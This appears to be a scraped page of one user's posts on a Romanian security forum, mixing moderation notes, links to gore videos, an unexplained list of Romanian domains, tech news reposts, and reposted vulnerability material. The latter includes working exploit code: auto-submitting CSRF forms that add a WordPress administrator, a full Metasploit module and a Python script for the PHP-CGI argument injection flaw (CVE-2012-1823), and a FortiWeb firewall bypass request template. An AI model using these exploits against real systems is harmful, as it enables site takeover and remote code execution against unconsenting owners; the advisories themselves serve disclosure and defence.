Nytro

Nu e pentru tine probabil.

Aaaaanntoneescuu de traiaaa...

Utilizatorului unu_1234567 i-a fost scos rangul de V.I.P. pentru ca a profitat de acest aspect pentru a castiga incredere. Nu va primi ban, in niciun caz, datorita contributiile sale, cei cu vechime vor intelege. Speram sa nu se repete. Ramane la latitudinea voastra sa decideti "castigatorul" moral al disputei si daca va veti implica in trade-uri cu ei, tineti insa cont ca amandoi sunt persoane care merita respect, desi multi probabil nu stiti nimic despre ei.

Nu sunt fake tinere, in Africa inca se ard femei pe rug pentru vrajitorie, realitatea e dura. In Tibet calugaritele isi dau foc singure: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore Self Immolation of a Nun in Tibet | Best Gore Apoi, in mijlocu "civilizatiei": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/

Pff, nu imi place cum e facuta libraria, exemplul http://rolling-curl.googlecode.com/svn/trunk/example_groups.php nu cred ca te ajuta. Foloseste curl simplu, cu curl_multi_exec.

Photoshop CS5 (12.04 parca) crapa, dar nu se executa shellcode-ul. Are cineva CS5.1 sa incerce?

[TABLE=width: 720] [TR] [TD]1.[/TD] [TD]casadinpitesti.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]2.[/TD] [TD]smartprices.info[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]3.[/TD] [TD]www.activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]4.[/TD] [TD]www.originalhandmade.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]5.[/TD] [TD]activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]6.[/TD] [TD]www.ice-tropez.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]7.[/TD] [TD]www.novelresearch.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]8.[/TD] [TD]www.perlamamaia.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]9.[/TD] [TD]daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]10.[/TD] [TD]www.daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]11.[/TD] [TD]www.enovate.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]12.[/TD] [TD]www.casa-agave.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]13.[/TD] [TD]www.uniromexim.ro[/TD] [TD]Whois [+][/TD] [/TR] [/TABLE] Prietenii stiu de ce.

Sunt baieti buni amandoi (din alte puncte de vedere), vom vedea diseara ce e de facut.

PHP-CGI Exploitation by Example - SpiderLabs Anterior

[h=1]Descarca BitDefender Total Security 2013 Beta – Testarea a inceput[/h] By Radu FaraVirusi(com) on May 7, 2012 BitDefender anunta lansarea produsului BitDefender Total Security 2013 Beta, care poate fi evaluat gratuit timp de 60 de zile. Ce noutati aduce? Device Anti-Theft USB Immunizer Windows Widget imbunatatiri aduse Parental Control, BitDefender SafeBox, MyBitDefender Dashboard Pentru a descarca BitDefender Total Security 2013 Beta accesati: Bitdefender Total Security 2013 BETA Sursa: Descarca BitDefender Total Security 2013 Beta – Testarea a inceput

[h=1]Fortinet FortiWeb Web Application Firewall Policy Bypass[/h] BINAR10 Report on Fortinet Fortiweb Findings 02/05/2012 - Fortinet FortiWeb Web Application Firewall Policy Bypass - ============================================================ 1) Affected Product Fabricant: Fortinet Product name: FortiWeb Version: Latest update to Tue, 2 May 2012 Type: Web Application Firewall Product URL: http://www.fortinet.com/products/fortiweb/index.html 2) Description of the Findings BINAR10 has found a policy bypass occurrence when large size data is sent in POST (data) or GET request. 3) Technical Details 3.1. POST Request Example When is appended to a POST request any padding data that surpasses 2399 bytes, the WAF do not inspect the data sent and the request hits directly the application. This should occur when the product is not configured to block malformed requests, but this feature also check the POST size limit, blocking the request if it surpass a fixed limit, therefore is likely that is being disabled due to application requirements in medium size forms. The response is also not verified by the WAF and information disclosure occurs with details of the infrastructure. This bypass could be used to inject different types of vectors, as is shown in the example only is needed to append a new variable at the end of the POST data filled with arbitrary data that exceeds 2399 bytes. ---POST example POST /<path>/login-app.aspx HTTP/1.1 Host: <host> User-Agent: <any valid user agent string> Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: <the content length must be at least 2399 bytes> var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes> 3.2. GET Requests The same issue with POST Request but it could be done through the sending arbitrary data at the end of the URL. --GET example http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data> 4. Validation Required It requires the validation of other researchers who have access to product. 5. Time Table 04/27/2012 - Vendor notified. 04/27/2012 - Vendor response, requiring some tests. 05/02/2012 - Vendor indicates that this is a configuration problem and not a product vulnerability. 6. Credits Geffrey Velasquez <geffrey at gmail.com> at BINAR10 S.A.C. Sursa: Fortinet FortiWeb Web Application Firewall Policy Bypass

The curious case of Benjamin Button Sherlok Holmes Ring of the nibelungs The illusionist The librarian Butterfly effect Dark floors Room 1408 The cube The eye Triangle Nu neaparat psihologice, dar care merita vazute.

Eu l-am mutat acolo (de la Anunturi + warn), nu stiam unde altundeva. Calm.

Pe aici v-ati uitat: oberhumer.com: LZO real-time data compression library ?

[h=1]Wordpress 3.3.1 Multiple CSRF Vulnerabilities[/h] +---------------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Wordpress 3.3.1 Multiple CSRF Vulnerabilities # Date : 19-03-2012 # Author : Ivano Binetti (http://www.ivanobinetti.com) # Software link : http://wordpress.org/wordpress-3.3.1.zip # Vendor site : http://wordpress.org # Version : 3.3.1 (and lower). Probably also version 3.3.2 is affected. # Tested on : Debian Squeeze (6.0) # Original Advisory : http://www.webapp-security.com/2012/04/wordpress-3-3-1-multiple-csrf-vulnerabilities/ # CVE : CVE-2012-1936 # OSVDB ID : 81588 # Bugtraq ID : 53280 +---------------------------------------------------------------------------------------------------------------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 2.1 Multiple CSRF 3)Exploit 3.1 CSRF (Change Post Title) 3.2 CSRF (Add Admin) +---------------------------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction WordPress "is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time." 2)Vulnerability Description 2.1 Multiple CSRF Wordpress 3.3.1 suffers from multiple CSRF vulnerabilities which allow an attacker to change post title, add administrators/users, delete administrators/users, approve and unapprove comment, delete comment, change background image, insert custom header image, change site title, change administrator's email, change Wordpress Address, change Site Address, when an authenticated user/admin browses a special crafted web page. May be other parameters can be modified. This vulnerability is caused by a security flaw in anti-CSRF token (_wpnonce, _wpnonce_create-user, _ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-custom-header-upload) generation. For some operations (see below) above specified anti-CSRF tokens are not associated with the current user session (as Owasp recommends) but are the are valid for all operations (for a specific administrator/user) within 12 hour. The above described vulnerability allows an attacker - who has sniffed anti-CSRF token - to have 12 hour to perform a CSRF attack. For Owasp recommendation about anti-CSRF token, you can read the following document: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern This problem affects the following operations: - Add Admin/User - Delete Admin/User - Approve comment - Unapprove comment - Delete comment - Change background image - Insert custom header image - Change site title - Change administrator's email - Change Wordpress Address - Change Site Address Other operations (like insert a new post) are not affected by this CSRF vulnerability. In this Advisory I will only demonstrate how to change post title and how to add a new administrator account. 3)Exploit 3.1 CSRF (Change Post Title) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to change post title</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php"> <input type="hidden" name="post_title" value="hackedtitle"/> <input type="hidden" name="post_name" value="hackedtitle"/> <input type="hidden" name="mm" value="03"/> <input type="hidden" name="jj" value="16"/> <input type="hidden" name="aa" value="2012"/> <input type="hidden" name="hh" value=""/> <input type="hidden" name="mn" value=""/> <input type="hidden" name="ss" value=""/> <input type="hidden" name="post_author" value="1"/> <input type="hidden" name="post_password" value=""/> <input type="hidden" name="post_category%5B%5D" value="0"/> <input type="hidden" name="post_category%5B%5D" value="1"/> <input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/> <input type="hidden" name="comment_status" value="open"/> <input type="hidden" name="ping_status" value="open"/> <input type="hidden" name="_status" value="publish"/> <input type="hidden" name="post_format" value="0"/> <input type="hidden" name="_inline_edit" value="<sniffed_value>"/> <input type="hidden" name="post_view" value="list"/> <input type="hidden" name="screen" value="edit-post"/> <input type="hidden" name="action" value="inline-save"/> <input type="hidden" name="post_type" value="post"/> <input type="hidden" name="post_ID" value="1"/> <input type="hidden" name="edit_date" value="true"/> <input type="hidden" name="post_status" value="all"/> </form> </body> </html> Note: this exploit simulate changing of post title using "Quick Edit" function 3.2 CSRF (Add Admin) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add Administrator</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php"> <input type="hidden" name="action" value="createuser"/> <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/> <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/> <input type="hidden" name="user_login" value="admin2"/> <input type="hidden" name="email" value="admin2@admin.com"/> <input type="hidden" name="first_name" value="admin2@admin.com"/> <input type="hidden" name="last_name" value=""/> <input type="hidden" name="url" value=""/> <input type="hidden" name="pass1" value="password"/> <input type="hidden" name="pass2" value="password"/> <input type="hidden" name="role" value="administrator"/> <input type="hidden" name="createuser" value="Add+New+User+"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------------------------+ Sursa: Wordpress 3.3.1 Multiple CSRF Vulnerabilities

[h=1]PHP CGI Argument Injection[/h] ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP CGI Argument Injection', 'Description' => %q{ When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary." }, 'Author' => [ 'egypt', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ "CVE" , "2012-1823" ], [ "URL" , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited 'Space' => 262144, # 256k }, 'DisclosureDate' => 'May 03 2012', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]), ], self.class) end # php-cgi -h # ... # -s Display colour syntax highlighted source. def check uri = target_uri.path uri.gsub!(/\?.*/, "") print_status("Checking uri #{uri}") response = send_request_raw({ 'uri' => uri }) if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable") return Exploit::CheckCode::Unknown end response = send_request_raw({ 'uri' => uri + '?-s'}) if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi return Exploit::CheckCode::Vulnerable end print_error("Server responded indicating it was not vulnerable") return Exploit::CheckCode::Safe end def exploit begin args = [ "-d+allow_url_include%3d#{rand_php_ini_true}", "-d+safe_mode%3d#{rand_php_ini_false}", "-d+suhosin.simulation%3d#{rand_php_ini_true}", "-d+disable_functions%3d%22%22", "-d+open_basedir%3dnone", "-d+auto_prepend_file%3dphp://input", "-n" ] qs = args.join("+") uri = "#{target_uri}?#{qs}" # Has to be all on one line, so gsub out the comments and the newlines payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "") response = send_request_cgi( { 'method' => "POST", 'global' => true, 'uri' => uri, 'data' => payload_oneline, }, 0.5) handler rescue ::Interrupt raise $! rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused print_error("The target service unreachable") rescue ::OpenSSL::SSL::SSLError print_error("The target failed to negotiate SSL, is this really an SSL service?") end end def rand_php_ini_false Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)]) end def rand_php_ini_true Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)]) end end [h=1]PHP CGI Argument Injection Exploit[/h] ###################################################################################### # Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit # Date: May 4, 2012 # Author: rayh4c[0x40]80sec[0x2e]com # Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com ###################################################################################### import socket import sys def cgi_exploit(): pwn_code = """<?php phpinfo();?>""" post_Length = len(pwn_code) http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1 Host: %s Content-Type: application/x-www-form-urlencoded Content-Length: %s %s """ %(HOST , post_Length ,pwn_code) print http_raw try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((HOST, int(PORT))) sock.send(http_raw) data = sock.recv(10000) print repr(data) sock.close() except socket.error, msg: sys.stderr.write("[ERROR] %s\n" % msg[1]) sys.exit(1) if __name__ == '__main__': try: HOST = sys.argv[1] PORT = sys.argv[2] cgi_exploit() except IndexError: print '[+]Usage: cgi_test.py site.com 80' sys.exit(-1) Surse: - PHP CGI Argument Injection - PHP CGI Argument Injection Exploit

Bun, data si ora?

Esti in Bucuresti? Ne bagam la o bauta?

Smecheria cu salariile mari e ca de cele mai multe ori se semneaza contracte pe perioade mari de timp, probabil asa e si aici, daca semneaza pe 2-3 ani, deja in 6 luni stie de ajuns ca sa merite acel salariu (bine, 1 an sa zicem), apoi devine "profitabil" pentru firma.

[h=2]Android Ported to C#[/h] Oracle and Google are currently in a $1 billion wrestling match over Google’s use of Java in Android. But Java is not the only way to build native apps on Android. In fact, it’s not even the best way: we have been offering C# to Android developers as a high-performance, low-battery consuming alternative to Java. Our platform, Mono, is an open source implementation of the .NET framework that allows developers to write their code using C# while running on top of the Java-powered operating system, and then share that same code with iOS and Windows Phone. Unlike Sun with Java, Microsoft submitted C# and the .NET VM for standardization to ECMA and saw those standards graduated all the way to ISO strong patent commitments. The .NET framework is also covered by Microsoft’s legally binding community promise. Last July when Xamarin was getting started, we got our team together in Boston to plan the evolution of Mono on iOS and Android. After a day of kayaking in the Charles River, we sat down to dinner and turned our attention to how we could improve the performance and battery life of applications on Android, and make our own Mono for Android even better. The Xamarin team after a day of Kayaking, back when we were a small company Over and over we came back to the basics: Dalvik is a young virtual machine, it is not as performant or tuned as Mono and suffers from many of Java’s performance limitations without the benefit of the high-end optimizations from Oracle’s HotSpot. One crazy idea that the team had at that dinner was to translate Android’s source code to C#. Android would benefit from C# performance features like structures, P/Invoke, real generics and our more mature runtime. Although nothing happened back in July, this idea stuck in the back of our minds. Fast forward a few months: Mono for Android is doing great, and we are starting to think again about improving our own product’s performance on Android. What if we could swap out Java with faster C# and get rid of various Dalvik limitations in the process? Could we create an Android phone completely free of Java, and free of the limitations of the Dalvik VM? We decided it was crazy enough to try. So we started a small skunkworks project with the goal of doing a machine translation of Android from Java to C#. We called this project XobotOS. [h=2]The XobotOS Research Project[/h]The result of our efforts is that today we have most of Android’s layouts and controls entirely in C#. Here are some screenshots of XobotOS running on a Linux workstation, no Java involved: Getting to this point required that the majority of the Android Java code be translated from Java to C#, so what you see above represents very significant progress. So how did we do it? [h=2]Java Translation via Sharpen[/h]Android’s core codebase contains over a million lines of Java code, and we knew we wanted to be able to stay up to date with new releases of Android — in fact, we started with the Android 2.x source code back in 2011, and then upgraded XobotOS to Android 4.0 when Google open sourced Ice Cream Sandwich earlier this year. So for us, the only reasonable option was to do a machine translation of Java to C#, building and maintaining any necessary tools along the way. The tool we used as a starting point is called Sharpen. Sharpen is famous for helping people such as Frank Krueger port a Java applet to an award-winning iPad app in two months. We matured Sharpen a lot, and the result is a much-improved Java-to-C# translation tool for everyone. We are releasing this new version of Sharpen today along with the code for XobotOS and we hope that many more people will benefit from it and contribute to it. [h=2]Performance[/h]So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik? So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik? When C# came around, Microsoft modified the language in a couple of significant ways that made it easier to optimize. Value types were introduced to allow small objects to have low overheads and virtual methods were made opt-in, instead of opt-out which made for simpler VMs. Later on, Java and C# diverged in the way that they implemented generics. Java went with a full-backwards compatibility approach, while C# baked the support into the runtime. The C# approach led to a simple-to-use, simple-to-understand generics setup as well as being much more performant and complete. Since then, both the language and the execution environment have continued to evolve and improve. C# went from being a slightly better Java to be light-years ahead. From embracing dynamic programming, bring asynchronicity into the language, introduce iterators, functional programming constructs, embrace parallelism and got a great implementation of generics. Many of the these features came from the research done by Don Syme and his F# team that have kept a steady flow of new ideas getting injected into the language. Furthermore, Mono as a virtual machine has matured substantially in the last 10 years and is now considered to be on its 8th generation. All of this adds up. You can see the massive difference in the performance of structs and generics in this benchmark we ran of a simple binary tree implementation in Java and C#: [h=2]What’s Next[/h]Today we’re proud to announce that we’ve made XobotOS available on github so that you can try it out yourself. Our goal as a company is to provide the best platform for building mobile apps, and so XobotOS will not be a focus for us going forward. But it was a fun experiment to run, and as it turns out, a few technologies have come out of the effort that we’ll be able to include in future versions of our products: Direct Graphics Access to Skia: Currently Mono for Android accesses the underlying graphics libraries through Java, with the code that we built for XobotOS, we will skip the middleman and use Mono’s P/Invoke to get straight to the native rendering code in Skia. Java to C# tooling: Our new version of Sharpen is available as part of our XobotOS release. Replacing Java code with C# code we now have the tools necessary to replace some chunks of Java code with C# code where performance is critical and when C# can offer better solutions than Java has. Our plan is to take elements of the research project and integrate those into our products. A project that we started because we thought it would be fun to do has turned out to yield some serious benefits for our products. It’s important for a startup to stay focused, but sometimes you have to try something crazy to make progress. And who knows, maybe Google will thank us some day . Xamarin is hiring for many positions to advance the state of the art in mobile development. Sursa: Android Ported to C# – Xamarin

Legat de Microsoft Windows, pentru cei care sunt sceptici la securitatea sistemelor Windows... Windows Firewall: Group policy editor: File permissions: Si multe altele. Windows nu e tocmai "inapt" la capitolul securitate, de fapt, dupa parerea mea sta cel mai bine la acest capitol, iar Linux si alte sisteme de operare mai au mult pana sa ajunga la nivelul sau, problema e simpla "utilizatorii". Cati or sta sa isi configureze reguli in firewall sau sa puna restrictii pe foldere? Nimeni. De aceea eu ma astept sa nu se planga nimeni. Windows are cu ce, dar nu are cu cine. Deci Microsoft are tot dreptul sa ii ia peste picior pe Apple.

Updated: Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities Exploit writing: A basic Idea. Subterfuge - Man-in-the-Middle Attack Framework Tutorial Angajatii lui Zuckerberg se imbogatesc inca de la angajare Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6) Arbitrary File Upload And Bypassing Protections(Dvwa) Dos Attack On Win8 With Hping3 (Packet Flooding) Spoofing Dns With Nmap Fast Track Script Social Engineer-Toolkit And Windows Credentials Editor Microsoft Windows Eot Font Table Directory Integer Overflow. Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack" Athcon 2011 Exploiting Anti-Reversing Techniques Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec Arp/Dns Spoofing Steal Facebook Password (Lan Environment) Privilege Escalation via "Sticky" Keys Oracle discloses new zero day exploit and launches JDK for OS X SyScan 2012 Singapore slides Windows 8 Forensic Guide An interesting case of Mac OSX malware Targeting ZeroAccess Rootkit’s Achilles’ Heel Facebook source code hacker explains,what really happened ! Bitdefender USB Immunizer https://www.facebook.com/rstforum Facebook: https://www.facebook.com/rstforum

[h=1]How far behind is Apple's security?[/h]Paul Wagenseil, SecurityNewsDaily Managing Editor Kaspersky Lab founder Eugene Kaspersky made headlines last week when he declared that Apple was "10 years behind Microsoft in terms of security." Kaspersky was referring to the recent spread of the Flashback family of malware, which was greatly aided by Apple's long delay in patching a known software flaw. But is Apple really 10 years behind the times? "I'd say that Apple's got another 10 years to go before their security will become as much of a laughingstock as Microsoft's," said Jonathan Zdziarski, author of "Hacking and Securing iOS Applications" (O'Reilly, 2012) and a forensic scientist who hacks into iPhones for Chicago-based viaForensics. "Comparing Apple and Microsoft is like comparing apples and oranges," said Mikko Hypponen, chief security officer of Finnish anti-virus firm F-Secure. (Msnbc.com is a joint venture of Microsoft and NBCUniversal.) [FAQ: The New Mac Virus and Apple Anti-Virus Options] Trustworthy computing– Kaspersky's choice of 10 years as the time frame was not random. In January 2002, then-Microsoft chairman Bill Gates issued his famous "Trustworthy Computing" memo to all company personnel. He wrote it shortly after the release of Windows XP, when the brand-new platform was under constant attack by virus writers and hackers. "Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms," Gates wrote in the memo. "Our responsiveness has been unmatched — but as an industry leader we can and must do better. ... Eventually, our software should be so fundamentally secure that customers never even worry about it." Gates' memo inaugurated a companywide focus on security, an aspect that had been neglected for the first two decades of Microsoft's existence. Ten years later, Windows 7 users still need to worry about malware, but Microsoft's current platform is tremendously much stronger and more secure than Windows XP. (Even today, XP, not Windows 7, gets the most malware attacks.) "Microsoft has improved their security massively since 2002," Hypponen said. "Today, they are [a] model for good security process in many ways." Microsoft got to that point by essentially outsourcing Windows security. The entire anti-virus industry, with sales of several billion dollars per year, is built on defeating malware that targets Windows. The existence of that industry frees up Microsoft to work on patching its Windows, which it does extensively every month. Microsoft's open model lets major Windows software makers such as Adobe or Oracle do the same without Microsoft's approval. Go your own way Apple, on the other hand, disdains third-party anti-virus software for Macs — though it does exist — and insists on patching certain pieces of third-party software itself. The Flashback software flaw, discovered in January, was patched for Windows in three weeks. It wasn't patched for Macs until after nearly three months — and after an estimated 600,000 Macs worldwide had been infected. "Apple needs to learn the meaning of transparency," Zdziarski said. "They need to communicate with their user base and with the security community. They need to be quicker to respond to threats." He pointed out that Apple's closed-lipped attitude also applies to iOS, the software that runs the iPhone, iPad and iPod Touch. "Some iOS attacks from the past took months to fix," Zdziarski said. "The [iPhone] jailbreak community had fixes out for users before Apple did. That's shameful." Qualified kudos Despite the secrecy, and despite the lack of attacks on Mac OS X, Apple has for many years incorporated the latest security innovations into its operating systems. "Apple might have some sort of an attitude problem, which shows in their slow patch cycles and so [on]," Hypponen said. "But otherwise, it's hard to critique them with all they've done with OS X: app sandboxing, memory randomization, NX [non-executable memory] support, [the] App Store model." When the iPhone was introduced, Apple was starting from scratch on a brand-new operating system. It took the opportunity to bake advanced security features into iOS from the very beginning. "[The] iPhone (or actually, iOS) is a massive security success," Hypponen said. "iOS is now 5 years old and we still haven't seen a single malware attack against it." Zdziarski wasn't sure how long that blissful interlude would last. "With Objective-C applications now on over 100 million-plus devices, the threat is very real," he said, referring to the programming language used to create Mac OS X and iOS software. "It's only a matter of time before a serious worm hijacks tens of millions of devices and thousands of App Store apps at once, and similar on the desktop," Zdziarski said. "Flashback seemed small potatoes; more of a warning that Apple runs the risk of screwing up as big as Microsoft in letting poor design lead to widespread attacks." Sursa: How far behind is Apple's security? - Technolog on msnbc.com